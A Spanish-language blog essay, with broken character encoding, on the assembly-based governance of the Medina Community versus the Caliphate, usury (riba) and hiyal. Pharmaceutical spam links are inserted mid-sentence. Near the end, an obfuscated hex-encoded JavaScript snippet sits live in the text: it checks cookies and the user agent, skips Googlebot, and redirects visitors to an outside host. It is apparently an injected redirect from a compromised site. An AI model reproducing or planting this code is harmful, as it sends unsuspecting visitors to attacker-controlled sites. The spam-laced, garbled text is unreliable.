miércoles , abril 25 2018
Fundamentos mentales

Sobre el concepto islA?mico del poder en la Comunidad de Medina

Una pregunta a modo de prolegA?meno:

A?PodrA�a una augmentin delivery shura mundial de la ummah en la que estuviesen representadas todas las tendencias del islam, incluidas las chiitas, sufA�es y cualquiera de las derivadas de estas, emitir una fatua en la que se declarase fuera del islam al wahabismo?

La primera generaciA?n de musulmanes que conociA? al Profeta no solo tenA�a la guA�a de la RevelaciA?n aA?n viva de la que habA�a sido testigo directamente, sino que ademA?s tenA�a la del ejemplo de vida que el mismo Profeta Muhammad daba en cuanto a la posiciA?n que este ostentaba en el seno de la Comunidad de Medina, y de cA?mo esta favorecA�a el desarrollo de una forma de organizaciA?n social muy sui generis en su A�poca.

El Profeta nunca fue un tirano, ni siquiera un gobernante en el sentido del tA�rmino, pues gobernaba en Medina una asamblea en la que A�l era un miembro mA?s, pero a su muerte los musulmanes que en vida le conocieron imitaron no su ejemplo en la Comunidad social de Medina basada en una forma de gobierno democrA?tica y asamblearia, sino que volvieron sus ojos a las formas de gobierno que entonces imperaban entre persas y bizantinos.

1.- El prematuro eclipse de la Comunidad de Medina

Si la primera construcciA?n sociolA?gica que levantaron los musulmanes fue la Comunidad de Medina, la primera construcciA?n sociolA?gica que sentA? las bases del islam que hoy dA�a conocemos no fue esa misma Comunidad de Medina, sino el Califato edificado a imagen y semejanza de la estructura geopolA�tica de los imperios persa y bizantino. El Profeta no fue rey ni intentA? crear un estado militar con fines expansionistas, a pesar de lo cual con la entronizaciA?n del primer Califa tras su muerte se comenzaron a sentar las bases del islam que hoy en dA�a conocemos. Esta construcciA?n sociolA?gica que es el islam de base califal algo negativo tendrA�a en sus cimientos para haberse convertido en la tiranA�a polA�tica, econA?mica, religiosa, que hoy dA�a rige en el islam, y que obviamente tiene bases histA?ricas.

El CorA?n no establece una determinada forma de gobierno, pero la prA?ctica de la Comunidad de Medina sA� lo transmitiA?, y sobre todo el ejemplo del Profeta Muhammad en el seno de esta, que no era obedecido como un rey, pues a pesar de lo que popularmente puede creerse las decisiones se tomaban en asamblea de la que el Profeta era parte, y durante ella el Profeta exponA�a sus puntos de vista como un miembro mA?s. Esta forma de regir los destinos de la comunidad no significaba que se la privaba de tener un gobierno, o de defenderse de las agresiones externas, sino que ademA?s de defenderla de las agresiones externas se la defendA�a tambiA�n de la posibilidad de caer en manos de un tirano. Pero los compaA�eros del Profeta no gobernaron como miembros de la asamblea de Medina sino como guA�as coronados de los creyentes o califas, posicionA?ndose con ello en un puesto cuyo ejemplo no podrA�an haberlo tomado de Muhammad, sino de los monarcas persas y bizantinos que eran sus enemigos.

No hay nada de inocencia en esta forma de gobierno asamblearia que era la Comunidad de Medina, sino de inteligencia al salvaguardar a los musulmanes de la tiranA�a de los reyes. Se podA�a gobernar perfectamente siguiendo las pautas establecidas por Muhammad en Medina, haberse defendido de las agresiones externas, y empezar a enseA�ar a las comunidades vecinas que asA� es como debA�an regirse, formando con ellas comunidades locales federadas. Medina se podA�a haber de esta manera proyectado como ejemplo para las localidades vecinas. Los cimientos del islam se edificaron asA� sobre la construcciA?n sociolA?gica del califato, pero no sobre los cimientos establecidos en la Comunidad de Medina. La direcciA?n para una edificaciA?n sociolA?gica del islam era un sistema asambleario de gobierno indisociable del comercio sin usura, pero este se edificA? sobre el califato, sistema imperial de gobierno con economA�a basada en la usura.

El islam como construcciA?n sociolA?gica de base corA?nica nunca llegA? pues a edificarse, porque a la muerte del Profeta Muhammad sus compaA�eros decidieron edificar un islam de base califal, o sea, sobre una construcciA?n sociolA?gica que imitaba las dinA?micas geopolA�ticas persas y bizantinas. La direcciA?n marcada por la Comunidad de Medina quedA? eclipsada a la muerte del Profeta Muhammad no llegando a implementarse nunca, renunciando a la posibilidad de haberse constituido en arquetipo sociolA?gico y geopolA�tico que ante sus vecinos contrarrestase la visiA?n de persas y bizantinos basada en el espejismo de poder con el que estos imperios deslumbraron a los primeros lA�deres musulmanes.

2.- El Pacto de Medina como prototipo de organizaciA?n asamblearia

La Comunidad de Medina se asentA? sobre unas bases jurA�dicas que son conocidas como un documento histA?rico denominado Pacto de Medina. HabA�a tres grandes comunidades entonces, musulmanes nativos de Medina, musulmanes emigrados, y los paganos, a ojos de los musulmanes. Era un pacto equitativo tripartito, que incluA�a incluso a los no musulmanes en pie de igualdad con los musulmanes. El Pacto de Medina establecA�a un sistema de gobierno basado en la shura o asamblea y en una economA�a basada en un comercio exento de usura que era el prototipo de una forma de organizaciA?n social con fundamento corA?nico diseA�ado para ser trasplantado a las comunidades vecinas, pero fue el islam califal el que se edificA? tras la muerte de Muhammad.

La Comunidad de Medina marcA? la direcciA?n hacia la que, si esa era su voluntad, los musulmanes debA�an edificar su construcciA?n sociolA?gica para par con ella incidir en el mundo. Cada colectivo humano edifica construcciones sociolA?gicas para vivir en sociedad e incidir en el mundo. A los musulmanes se les mostrA? el ejemplo del profeta en la Comunidad de Medina para que les sirviese de guA�a, pero tras su muerte aquellos musulmanes que tenA�an la capacidad de decidir hacia quA� direcciA?n debA�a dirigir la construcciA?n de su sociedad, ya sea la marcada por la Comunidad de Medina ya sea por cualquier otra, tomaron su decisiA?n libremente y, basA?ndose en ello, decidieron obviar la guA�a de la Comunidad de Medina y decantarse por a�?otraa�? construcciA?n sociolA?gica, que fue el califato, inspirada en las estructuras de poder persas y bizantinas.

La Comunidad de Medina promovA�a la disoluciA?n del poder jerA?rquico en su seno, procuraba una forma de organizaciA?n social que pudiese integrar a las distintas comunidades que la constituA�an, al aceptar iguales derechos para musulmanes nativos, musulmanes emigrados y paganos, todo ello reflejado en el Pacto de Medina, asA� como promovA�a tambiA�n la gA�nesis de un sistema econA?mico y financiero diferente al vigente en las tierras de los imperios persa y bizantino. ConstituyA? el prototipo sociolA?gico a travA�s del cual se podA�a haber superado el concepto de Estado, no ya por su configuraciA?n polA�tica, que de una manera mA?s arcaica tambiA�n se habA�a manifestado en las polis griegas, sino por su configuraciA?n econA?mica. Y es este punto el que yo considero esencial: el de no disociar el asamblearismo polA�tico del asamblearismo econA?mico y financiero.

La Comunidad de Medina no tenA�a por quA� ser concebida como una meta idA�lica petrificada en el tiempo a la que aspirar como ejemplo, sino como un punto de partida a travA�s del cual desarrollar nuevas formas de organizaciA?n social, teniendo en cuenta la premisa de que las formas polA�ticas locales debA�an estar fusionadas con las estructuras financieras tambiA�n locales, impidiendo con ello el desarrollo de estructuras polA�ticas basadas en la idea de imperio. Pero este punto de partida se quedA? solo en eso al no haber pasado nunca de la fase embrionaria que comenzA? a gestarse en los tiempos en que Muhammad viviA? en la Comunidad de Medina. El islam sociolA?gico no fue levantado entonces sobre el prototipo diseA�ado en Medina y, obviamente, pendiente de desarrollar, sino sobre el prototipo derivado de la mentalidad islamocrA?tica que supuso el Califato como espejo de los imperios persa y bizantino.

El Pacto de Medina, el instrumento legal que cimentA? la Comunidad de Medina, estableciA? las bases legales para gobernar la ciudad. Se gobernA? con pues con leyes consensuadas. Dicho consenso fue establecido sobre el principio del taaruf, where to buy zyprexa cheap acercamiento y conocimiento entre las comunidades humanas que conformaban Medina, cuya mA?xima manifestaciA?n fue la shura, a travA�s de la que se ejercA�a la consulta popular. En la Comunidad de Medina no habA�a fiqh ni juristas (alfaquA�es o fuqahas), ni siquiera son estos conceptos corA?nicos. Este consenso basado en el principio del taaruf y manifestado en el ejercicio del gobierno a travA�s de la consulta en la shura constituyeron los principios rectores sobre los que se ejercA�a el gobierno entonces en Medina.

El fundamento del taaruf y de la shura se encuentran en CorA?n 3:159, donde se vislumbre la praxis asamblearia en la cual se conmina a Muhammad a gobernar a travA�s de la consulta, y tambiA�n en CorA?n 42:36-39 donde se exhorta a los miembros de la comunidad a consultarse mutuamente para decidir sobre los asuntos que les ataA�en y a defenderse tambiA�n mutuamente cuando son vA�ctimas de opresiA?n independientemente de la adscripciA?n religiosa a la que estA�n adheridos.

No tiene sentido defender la idea de que la Comunidad de Medina no se gobernaba mediante la consulta sino que lo hacA�a mediante los privilegios jerA?rquicos otorgados por http://ronyiswandi.mhs.narotama.ac.id/2018/03/15/purchase-penegra-reviews/ Allah a Muhammad. A?DesobedeciA? entonces Muhammad a Allah gobernando en Medina con los privilegios de un jerarca que no necesitaba gobernar mediante la consulta en asamblea?

3.- El Califato manipulA? las premisas financieras corA?nicas con el hiyal

El jurista y filA?sofo persa Al-Gazali (1058 a�� 1111) escribiA? una obra enciclopA�dica denominada La revivificaciA?n de las ciencias religiosas, donde recogiA? algunos capA�tulos relativos a temas econA?micos, donde determinaba asuntos como las premisas que debA�an sustentar el interA�s pA?blico (maslaha), o donde hacA�a una fuerte denuncia de las polA�ticas de especulaciA?n financiera, ampliamente difundidas entonces, que incidA�an en la manipulaciA?n de la moneda, que a su juicio debA�a mantenerse estable (sunnah monetaria), y en la que denunciaba tambiA�n la acumulaciA?n de dinero.

Una prA?ctica econA?mica tA�pica de la especulaciA?n financiera que se practicaba en el orbe islA?mico era el hiyal, dispositivos legales de naturaleza ficticia que tenA�an por objetivo crear un subterfugio de legalidad que permitiese saltarse la teA?rica prohibiciA?n de la riba. El hiyal de entonces tendrA�a su proyecciA?n en el presente en las tA�cnicas financieras utilizadas por la banca islA?mica para crear una ficciA?n legal respecto a que sus tA�cnicas financieras respetan la prohibiciA?n corA?nica de la usura.

La prA?ctica del hiyal en la economA�a y las tA�cnicas financieras que han caracterizado toda la historia econA?mica del islam comenzaron siendo un hA?bito no institucionalizado, al no consistir en tA�cnicas legales documentadas en tratados jurA�dicos, pero hacia comienzos del siglo IX (tercero de la HA�gira), empezaron a surgir tratados jurA�dicos donde se detallaban procedimientos con tA�cnicas del hiyal para poder compaginar la prA?ctica econA?mica y financiera fundamentada en la especulaciA?n con el principio corA?nico que prohibA�a la riba. La especulaciA?n financiera estuvo desde los primeros tiempos del islam separada del concepto corA?nico que podA�a abarcar la riba, y esta separaciA?n llegA? incluso a institucionalizarse a comienzos del siglo IX con el visto bueno de los juristas de mayor prestigio de la A�poca. El hiyal es el fundamento de la ocultaciA?n de la condena de la especulaciA?n financiera contenida en la RevelaciA?n, a travA�s de la exhortaciA?n a evitarla como abominaciA?n que era, segA?n CorA?n 5:90.

La riba al-fadl, especulaciA?n financiera o maysir segA?n se desprende de CorA?n 5:90, estuvo siempre presente en la historia del islam sociolA?gico o califal. Los musulmanes inventaron muchas cosas que luego los europeos cristianos adoptaron e hicieron pasar como suyas, despreciando e ignorando su origen islA?mico por razones que seguro no se nos escapan. Y entre esos inventos musulmanes estaban por ejemplo el de las letras de cambio acutane 10 mg online purchase (sulfaya), cuya prA?ctica entraba dentro de la http://www.3karatt.com/21197 riba al-fadl o maysir (especulaciA?n financiera). Estas letras de cambio y otras tA�cnicas derivadas de ellas estA?n en el origen de las corruptas prA?cticas de especulaciA?n financiera que los europeos cristianos harA�an luego suyas y que les servirA�an mA?s adelante para desarrollar el capitalismo financiero que luego acabarA�an extendiendo por todo el mundo.

JamA?s histA?ricamente la economA�a islA?mica ha funcionado sin riba (riba al-nasia, incremento con intercambio de bienes en tiempo diferido) o sin especulaciA?n financiera (riba al-fadl o maysir en CorA?n 5:90, incremento con intercambio de bienes en tiempo simultA?neo o con manipulaciones monetarias especulativas). La riba ha sido condenada por ulemas o juristas islA?micos, en menor medida que la especulaciA?n financiera por cuanto esta ha tenido mA?s detractores a la hora de considerarla haram, como lo ha sido por juristas de otras culturas monoteA�stas o politeA�stas histA?ricas. Pero en todas ellas, tanto la riba como la especulaciA?n financiera han sido prA?ctica habitual. Incluso los papas han condenado la usura, lo que supone un signo mA?s del carA?cter esperpA�ntico de la susodicha condenan.

La condena mA?s antigua conocida a la usura, popularmente, se remonta a un texto indio del II milenio a.C., donde a esta se la denomina bekanaa?�a en sA?nscrito vA�dico (*). Pero esta referencia vA�dica a la usura, a pesar de que asA� consta reflejada en una enciclopedia de internet muy popular, no es cientA�ficamente correcta, pues los especialistas en sA?nscrito vA�dico y religiones de la India consideran que la alusiA?n a la bekanata estA? en un himno del Mandala 8 (el 55) que figura entre los once himnos, entre seis y ocho para una minorA�a de especialistas, considerados valakhilya (aunque no literalmente, es un tA�rmino que viene a significar apA?crifo), pues se piensa fueron interpolados en A�poca posterior a la redacciA?n de los vedas. Un ensi de la ciudad-estado de Lagash llamado Urukagina (gobernA? entre 2380 a.C a�� 2360 a.C. aprox. ), tiene atribuida por la arqueologA�a la siguiente inscripciA?n, contenida en el cA?digo jurA�dico que se conoce por su nombre, anterior en muchos siglos al CA?digo de Hammurabi.

a�?A�l liberA? a los habitantes de Lagash de usura, los controles onerosos, el hambre, el robo, el asesinato, y la incautaciA?n (de su propiedad y las personas). EstableciA? la libertad. La viuda y al huA�rfano ya no estaban a la merced de un hombre poderosoa�? (CA?digo de Urukagina).

La especulaciA?n financiera siempre fue una prA?ctica de uso comA?n entre los comerciantes musulmanes. Por ello se ocultA? la exhortaciA?n corA?nica a evitar el maysir (especulaciA?n financiera) contenida en CorA?n 5:90, dA?ndole a la condena de la especulaciA?n financiera un carA?cter poco claro que solo se encontraba en algA?n hadiz, pero segA?n la tradiciA?n que se impuso, no lo estaba en el CorA?n. La tradiciA?n dice por ejemplo que el Profeta Muhammad muriA? exactamente despuA�s de recogerse sus palabras en un hadiz sobre la riba al-fadl, y que por esta razA?n no llegA? a darle tiempo de explicar quA� era exactamente esa segunda riba a la que se referA�a como al-fadl. Estas tA�cnicas de especulaciA?n financiera tienen por tanto base en el islam califal o islamocracia.

(*) Rig-Veda, Libro (Mandala) 8, himno 55, verso 10

4.- Muhammad fue juez en Medina, no gobernante absoluto

El CorA?n habla de Muhammad de su condiciA?n de juez que ha de dirimir sobre las disputas basA?ndose en el espA�ritu de la RevelaciA?n, pero no de su condiciA?n de gobernante absoluto. En los tiempos de la dA�cada medinense, aA?n en vida de Muhammad, no habA�a ninguna jurisprudencia desarrollada, ni juristas o ulemas a los que acudir para dirimir judicialmente sobre una disputa que enfrentase a dos parte, por ello El CorA?n les dice a los creyentes que en materia de disputas deben remitirse al Profeta y obedecer las decisiones que al respecto este sancione, por ello Muhammad hizo de juez entre los musulmanes.

a�?Juro que no se consideraran verdaderos creyentes a menos que te acepten como juez de sus disputas; y no se resistan a aceptar tu decisiA?n y se sometan completamentea�? CorA?n 4:65.

Cuando el CorA?n habla de la obediencia que los creyentes deben a Muhammad no lo hace pues posicionando al Profeta como un lA�der polA�tico al que se le deba obediencia ciega, pues esta idea es totalmente ajena al CorA?n, sino que lo hace posicionA?ndolo como juez que ha de dirimir acerca de los asuntos sobre los que los miembros de la Comunidad discrepan (CorA?n 4:65). Los musulmanes de la dA�cada de Medina parece que comprendieron perfectamente la distinciA?n del profeta como juez al que debA�an elevar sus disputas.

El CorA?n conmina a Muhammad a legislar mediante el mA�todo de la consulta en asamblea o shura (CorA?n 3:159), asA� como exhorta tambiA�n a los creyentes a legislar mediante la consulta en asamblea (CorA?n 42:38), lo que da idea de la concepciA?n del ejercicio del poder que se trasmite en la RevelaciA?n corA?nica que claramente sanciona una separaciA?n entre lo judicial y lo legislativo que solo habrA�a tenido implementaciA?n en la dA�cada medinense que conociA? a Muhammad en vida. Esta RevelaciA?n diluye el potencial del poder ejecutivo en el legislativo al conminar a Muhammad a consultar en asamblea con los otros miembros de la Comunidad (CorA?n 3:159), hecho que supone la esencia de la horizontalidad del poder sancionada en la RevelaciA?n en contraposiciA?n al posibilismo histA?ricamente vigente que sanciona una verticalidad del poder que se encuentra tambiA�n en la esencia del Califato surgido en imitaciA?n de los imperios persa y bizantino.

SegA?n la RevelaciA?n corA?nica Muhammad debA�a ser obedecido en lo que se refiere a dirimir sobre asuntos relativos al fiqh (CorA?n 4:59 y 4:65), pues no habA�a entonces ningA?n fiqh desarrollado ni juristas que sostuviesen el mismo durante los diez aA�os en que Muhammad dirigiA? la Comunidad de Medina. Si ni el Profeta se atribuyA? para sA� la supremacA�a de los gobernantes absolutos, A?por quA� sA� lo hicieron aquellos que aceptaron revestirse con la calidad de Califa tras su muerte?var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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Acerca de José Ángel Hernández

Ver también

Intolerancia religiosa, espiritualidad y fanatismo

Soy una persona de izquierdas, laica y progresista, trabajo en el A?mbito de las minorA�as …

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